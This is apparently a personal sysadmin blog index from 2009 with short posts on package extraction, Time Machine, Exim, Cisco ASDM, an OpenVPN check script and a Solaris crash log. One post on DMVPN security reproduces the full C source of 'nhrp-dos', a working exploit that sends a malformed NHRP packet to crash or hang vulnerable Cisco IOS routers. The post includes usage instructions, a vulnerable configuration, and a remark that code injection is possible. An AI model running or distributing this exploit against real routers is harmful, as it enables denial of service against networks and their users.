Extract files from DEB package

Some day ago, I wrote about RPM extraction, today I need content of DEB packcage, on the contrary of rpm systems debian package manager allow to extract natively by this command: #dpkg-deb -x somepackage.i386.deb But my problem is different, I not using Debian sytem, fortunately DEB files are “ar” archives, which contain three files: debian-binary control.tar.gz data.tar.gz first, extract “ar” archive with this simple command: # ar vx somepackage.i386.deb then extract the contents of data.tar.gz using tar: ...

10 November 2009 @ 06:00 · Updated: 30 June 2026 @ 03:28 · leo

Mac OS X - Time Machine network backup without Time Capsule

From OS X 10.5 (Leopard) Apple introduced Time Machine: a great combination of rsync/rsnapshot and a beautiful user interface. Time Machine works in two modes: 1. local volume on local area or 2. Time Capsule over network. Now I don’t wanna buy another box with apple logo over it for much $$$ when I have a lot of file servers on my network. Now I explain a few hoops to get this system to work: ...

3 November 2009 @ 04:44 · Updated: 29 June 2026 @ 04:47 · leo

Extract files from RPM package

There is no direct RPM option available via rpm command to extract an RPM file. But there is a small utility available called rpm2cpio. It Extract cpio archive from RPM Package Manager (RPM) package. Example extract RPM file using rpm2cpio and cpio command: # rpm2cpio somepackage.x86_64.rpm | cpio -idmv Output of rpm2cpio piped to cpio command with following options: i: Restore archive d: Create leading directories where needed m: Retain previous file modification times when creating files v: Verbose

2 November 2009 @ 04:58 · Updated: 30 June 2026 @ 03:28 · leo

Graphic Restyle

I’m working on graphic restyle, today the first release! Leo

28 October 2009 @ 12:00 · leo

Sun Ultra10 - Crash/Recovery

Yesterday after 1 year and 2 month uptime, my poor Sun Ultra 10 (Solaris OS10) running into home server room, was crashed.. I’m so sick, here the paste of console recovery procedure: Type 'go' to resume ok ? 1000000 Stack Underflow ok sync panic[cpu0]/thread=2a100057ca0: sync initiated sched: software trap 0x7f pid=0, pc=0xf0050c7c, sp=0x2a100056e81, tstate=0x8800001401, context=0x0 g1-g7: 104da44, 0, 183f000, 0, 1082400, 5, 2a100057ca0 00000000fffa9d10 unix:sync_handler+138 (fffe5718, 1000000, 1, 1083400, 1, 181500 0) %l0-3: 00000000018621b0 0000000001862000 000000000000017f 0000000001845800 %l4-7: 0000000000000000 000000000183f000 0000000000000009 0000000001810400 00000000fffa9de0 unix:vx_handler+80 (fffe5718, 181dfe8, f0000000, fffe0000, 181e 0f0, f003bda1) %l0-3: 000000000181e0f0 0000000000000000 0000000000000001 0000000000000001 %l4-7: 0000000001810c00 00000000f0000000 0000000001000000 0000000001018998 00000000fffa9e90 unix:callback_handler+20 (fffe5718, 1, 0, 0, 0, 0) %l0-3: 0000000000000016 00000000fffa9741 00000000f004a64c 00000000fffe0000 %l4-7: 0000000000000016 0000000000000000 0000000000000000 000000000180c000 syncing file systems... 3 done dumping to /dev/dsk/c0t0d0s7, offset 107413504, content: kernel 100% done: 15712 pages dumped, compression ratio 2.54, dump succeeded rebooting... Resetting ... Sun Ultra 5/10 UPA/PCI (UltraSPARC-IIi 440MHz), No Keyboard OpenBoot 3.25, 512 MB (50 ns) memory installed, Serial #15184795. Ethernet address 8:0:20:e7:b3:9b, Host ID: 80e7b39b. Rebooting with command: boot Boot device: /pci@1f,0/pci@1,1/ide@3/disk@0,0:a File and args: SunOS Release 5.10 Version Generic_137111-06 64-bit Copyright 1983-2008 Sun Microsystems, Inc. All rights reserved. Use is subject to license terms. Hostname: ultra10 Loading smf(5) service descriptions: 1/1 WARNING: svccfg import /var/svc/manifest/application/database/mysql.xml failed svccfg import warnings. See /var/svc/log/system-manifest-import:default.log . /dev/rdsk/c0t0d0s1 is clean ultra10 console login: root Password: Sep 29 23:02:52 ultra10 login: ROOT LOGIN /dev/console Last login: Tue Sep 29 22:21:42 from 192.168.2.15 Sun Microsystems Inc. SunOS 5.10 Generic January 2005 root@ultra10 ~ #

2 October 2009 @ 05:25 · Updated: 30 June 2026 @ 03:28 · leo

Cisco - ASA/PIX enable ASDM

fw01a> enable Password: fw01a# configure terminal fw01a(Config)# interface ethernet1 fw01a(Config-if)# nameif inside fw01a(Config-if)# ip address 192.168.1.1 255.255.255.0 fw01a(Config-if)# no shutdown fw01a(Config-if)# Activate ASDM and enable http server. fw01a(Config)# asdm image flash:/asdm.bin. fw01a(Config)# http server enable. Open a connection for your inside network. fw01a(Config)# http 192.168.1.0 255.255.255.0 inside Make sure all your config running properly. fw01a(Config)# show running http http server enabled http 192.168.1.0 255.255.255.0 inside fw01a(Config)# Now your Cisco ASA/PIX can be access from your PC, open your web browser then enter this address https://192.168.1.1/admin

17 September 2009 @ 14:49 · Updated: 30 June 2026 @ 03:28 · leo

Exim - Command

Some userfull Exim command: exim -bpmailq --- The mailq is relevant as it gives your the email IDs. exim -M emailIDforce delivery of one message exim -qf Force another queue run exim -qff Force another queue run and attempt to flush frozen messages exim -Mvl message IDView Log for message exim -Mvb message IDView Body for message exim -Mvh message IDView Header for message exim -Mrm message IDReMove message (no errors sent) exim -Mg message IDGive up and fail message, message bounces to sender

16 September 2009 @ 02:30 · Updated: 30 June 2026 @ 03:28 · leo

Watch - Exim Queue

Just in one line memo: # watch -n 5 'exim -bp | exiqsumm |grep TOTAL'

16 September 2009 @ 02:13 · Updated: 30 June 2026 @ 03:28 · leo

Cisco DMVPN/NBMA - Security

I’m working on experimental wide lab network based on DMVPN/NBMA, with some friends, dynamic multipoing vpn is seem a great solution, looks like a cheap frame relay infrastructure over internet. Now the problem: what about security? especially in dynamical wan ip address envivorment durin spoke-spoke communication, is impossible define security rule on GRE level. Solution: I’m thinking about… Only for testing purpose, I find this exploit: /******************************************************************************/ /* */ /* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */ /* */ /* Feel free to modify this code as you like, as long as you include the */ /* above copyright statement. */ /* */ /* Please use this code only to check your OWN cisco routers. */ /* */ /* Cisco bug ID: CSCin95836 */ /* */ /* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */ /* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */ /* subnetwork to determine the internetworking layer address and NBMA */ /* subnetwork addresses of the NBMA next hop towards the destination. */ /* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */ /* IPSEC. */ /* */ /* URLs: */ /* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */ /* - [RFC1701/GRE] http://rfc.net/rfc1701.html */ /* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */ /* logies_white_paper09186a008018983e.shtml */ /* */ /* This code was only tested on FreeBSD and Linux, no warranty is or will be */ /* provided. */ /* */ /* Vulnerable images (tested): */ /* */ /* - c7100-jk9o3s-mz.123-12e.bin */ /* - c7200-jk8o3s-mz.122-40.bin */ /* - c3640-js-mz.122-15.T17.bin */ /* (and many other IOS versions on different platforms) */ /* */ /* Vulnerable configuration on cisco IOS: */ /* */ /* interface Tunnel0 */ /* ip address 10.0.0.1 255.255.255.128 */ /* no ip redirects */ /* no ip proxy-arp */ /* ip mtu 1464 */ /* ip nhrp authentication mysecret */ /* ip nhrp network-id 1000 */ /* ip nhrp map multicast dynamic */ /* ip nhrp server-only */ /* ip nhrp holdtime 30 */ /* tunnel source FastEthernet0/0 */ /* tunnel mode gre multipoint */ /* tunnel key 123456789 */ /* */ /* This exploit works even if "ip nhrp authentication" is configured on the */ /* cisco router. You can also specify a GRE key (use 0 to disable this */ /* feature) if the GRE tunnel is protected. You don't need to know the */ /* NHRP network id (or any other configuration details, except the GRE key if */ /* it is set on the target router). */ /* */ /* NOTE: The exploit only seems to work, if a NHRP session between the target */ /* router and at least one client is established. */ /* */ /* Code injection is also possible (thanks to sky for pointing this out), but */ /* it is not very easy and depends heavily on the IOS version / platform. */ /* */ /* Example: */ /* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789 */ /* */ /* Router console output: */ /* */ /* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8 */ /* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000 */ /* <snip> */ /* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03 */ /* Cause 00000024 (Code 0x9): Breakpoint exception */ /* */ /* Writing crashinfo to bootflash:crashinfo_20070321-155011 */ /* === Flushing messages (16:50:12 CET Wed Mar 21 2007) === */ /* */ /* Router reboots or sometimes hangs ;) */ /* */ /* */ /* Workaround: Disable NHRP ;) */ /* */ /* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help */ /* regarding this issue. */ /* */ /* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */ /* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */ /* and #infiniteVOID */ /* */ /******************************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> /* BSD */ #define _BSD /* Header sizes */ #define IP_HDR_SIZE 20 #define GRE_HDR_SIZE 4 #define GRE_KEY_SIZE 4 #define NHRP_HDR_SIZE 62 /* Function prototypes */ int open_socket (void); int close_socket (int); int send_dos(int, unsigned long, unsigned long, unsigned long); unsigned long resolve_ip (char *); unsigned long get_int_ipv4 (char *); /* Globals */ int sockfd; int nhrp_req_id; /* GRE header */ struct gre_h { unsigned short flags; /* GRE flags */ unsigned short ptype; /* GRE protocol type */ unsigned int key; /* GRE key */ }; /* NHRP header */ struct nhrp_h { /* NHRP fixed header (20 bytes) */ struct { unsigned short afn; /* NHRP AFN */ unsigned short proto; /* NHRP protocol type */ unsigned int snap; /* NHRP SNAP */ unsigned short snapE:8; /* NHRP SNAP */ unsigned short hops:8; /* NHRP hop count */ unsigned short length; /* NHRP total length */ unsigned short checksum; /* NHRP checksum */ unsigned short mpoa_ext; /* NHRP MPOA extensions */ unsigned short version:8; /* NHRP version */ unsigned short type:8; /* NHRP type */ unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */ unsigned short nbma_sub:8; /* NHRP t/l of NBMA subaddr */ } fixed; /* NHRP mandatory part */ struct { unsigned short src_len:8; /* NHRP src protocol length */ unsigned short dst_len:8; /* NHRP dest protocol length */ unsigned short flags; /* NHRP flags */ unsigned int request_id; /* NHRP request ID */ unsigned long client_nbma; /* NHRP client NBMA address */ unsigned long client_nbma_sub; /* NHRP client NBMA subaddr */ unsigned long client_pro_addr; /* NHRP client protocol addr */ } mand; /* NHRP client information entries (CIE) */ union { struct { unsigned short code:8; /* NHRP code */ unsigned short pref_len:8; /* NHRP prefix length */ unsigned short reserved; /* NHRP reserved */ unsigned short mtu; /* NHRP MTU */ unsigned short holding_time; /* NHRP holding time */ unsigned short len_client:8; /* NHRP t/l cl addr */ unsigned short len_client_sub:8;/* NHRP t/l cl sub */ unsigned short len_client_pro:8;/* NHRP t/l cl pro */ unsigned short preference:8; /* NHRP preference */ unsigned short ext; /* NHRP extension */ } cie; }; }; /* Main function */ int main (int argc, char **argv) { /* Check command line */ if(argc != 4) { fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); fprintf(stderr, "------------------------------------------------\n"); fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n"); fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n"); exit(EXIT_FAILURE); } /* Check UID */ if(getuid() != 0 && geteuid() != 0) { fprintf(stderr, "Error: Please run as root!\n"); exit(EXIT_FAILURE); } /* Open a socket */ sockfd = open_socket(); /* Send DoS packet */ send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3])); /* Close the socket */ close_socket(sockfd); exit(EXIT_SUCCESS); } /* Open the socket */ int open_socket (void) { int fd; int one = 1; void *ptr = &one; /* Open the socket */ fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); if(fd < 0) { fprintf(stderr, "Error: open_socket: Unable to open socket.\n"); exit(EXIT_FAILURE); } /* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */ /* Otherwise it would be done by the kernel. */ if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) { fprintf(stderr, "Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); } #ifndef _BSD if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) { fprintf(stderr,"Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); } #endif return(fd); } /* Close the socket */ int close_socket (int fd) { return(close(fd)); } /* Resolve the hostname to IP address */ unsigned long resolve_ip (char *host) { struct in_addr addr; struct hostent *host_ent; if((addr.s_addr = inet_addr(host)) == -1) { if(!(host_ent = gethostbyname(host))) return(-1); memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); } return(addr.s_addr); } /* Get IPv4 address of DEVICE */ unsigned long get_int_ipv4 (char *device) { int tmp_fd; struct ifreq ifr; struct sockaddr_in *sin; tmp_fd = socket(PF_INET, SOCK_DGRAM, 0); if(tmp_fd < 0) { fprintf(stderr, "Error: get_int_ipv4: socket failed.\n"); exit(EXIT_FAILURE); } memset(&ifr, 0, sizeof(ifr)); sin = (struct sockaddr_in *) &ifr.ifr_addr; strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_addr.sa_family = AF_INET; if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) { fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n"); exit(EXIT_FAILURE); } close(tmp_fd); return(sin->sin_addr.s_addr); } /* Send NHRP packet */ int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip, unsigned long gre_key) { struct ip ip_hdr; struct ip *iphdr; struct gre_h gre_hdr; struct nhrp_h nhrp_hdr; struct sockaddr_in sin; unsigned int bytes = 0; int GRE_SIZE = GRE_HDR_SIZE; /* Packet buffer */ unsigned char *buf; if(gre_key!=0) GRE_SIZE+=GRE_KEY_SIZE; /* Allocate some memory */ buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE); if(buf < 0) { fprintf(stderr, "Error: send_dos: malloc failed.\n"); exit(EXIT_FAILURE); } /* Increment NHRP request ID */ nhrp_req_id++; /* IPv4 Header */ ip_hdr.ip_v = 4; /* IP version */ ip_hdr.ip_hl = 5; /* IP header length */ ip_hdr.ip_tos = 0x00; /* IP ToS */ ip_hdr.ip_len = htons(IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE ); /* IP total length */ ip_hdr.ip_id = 0; /* IP identification */ ip_hdr.ip_off = 0; /* IP frag offset */ ip_hdr.ip_ttl = 64; /* IP time to live */ ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */ ip_hdr.ip_sum = 0; /* IP checksum */ ip_hdr.ip_src.s_addr = src_ip; /* IP source */ ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination */ /* GRE header */ if(gre_key != 0) { gre_hdr.flags = htons(0x2000); /* GRE flags */ gre_hdr.key = htonl(gre_key); /* GRE key */ } else { gre_hdr.flags = 0; } gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP) */ /* NHRP fixed header */ nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */ nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol type */ nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */ nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */ nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count */ /* DoS -> Set length to 0xFFFF */ nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */ /* Checksum can be incorrect */ nhrp_hdr.fixed.checksum = 0; /* NHRP checksum */ nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext */ nhrp_hdr.fixed.version = 1; /* NHRP version */ nhrp_hdr.fixed.type = 3; /* NHRP type */ nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l addr */ nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l sub */ /* NHRP mandatory part */ nhrp_hdr.mand.src_len = 4; /* NHRP src proto len */ nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto len */ nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */ nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID */ nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client addr */ nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub */ nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client proto */ /* NHRP client information entries (CIE) */ nhrp_hdr.cie.code = 0; /* NHRP code */ nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len */ nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved */ nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */ nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding time */ nhrp_hdr.cie.len_client = 0; /* NHRP t/l client */ nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */ nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */ nhrp_hdr.cie.preference = 0; /* NHRP preference */ nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type (ext)*/ /* Copy the IPv4 header to the buffer */ memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr)); /* Copy the GRE header to the buffer */ memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr)); /* Copy the NHRP header to the buffer */ memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr, sizeof(nhrp_hdr)); /* Fix some BSD bugs */ #ifdef _BSD iphdr = (struct ip *) buf; iphdr->ip_len = ntohs(iphdr->ip_len); iphdr->ip_off = ntohs(iphdr->ip_off); #endif memset(&sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = iphdr->ip_dst.s_addr; printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); printf("------------------------------------------------\n"); printf("Sending DoS packet..."); /* Send the packet */ bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr)); printf("DONE (%d bytes)\n\n", bytes); /* Free the buffer */ free(buf); /* Return number of bytes */ return(bytes); } // milw0rm.com [2007-08-09] Download

16 September 2009 @ 01:54 · Updated: 30 June 2026 @ 03:28 · leo

Auto Check - OpenVPN

Su connessioni fastweb usando openvpn è in caso di restart dei router di destinazione spesso le sessioni restano appese e non viene ristabilito il tunnel, in teoria questo bug è stato risolto nelle ultime release, per non rischiare 4 righe di script: #!/bin/bash if ! ping -c 1 -w 5 "xxx.xxx.xxx.xxx" &>/dev/null ; then /etc/init.d/openvpn restart fi Eseguite ogni 5 minuti come da cron: */5 * * * * /root/yeahup

14 September 2009 @ 01:45 · Updated: 30 June 2026 @ 03:28 · leo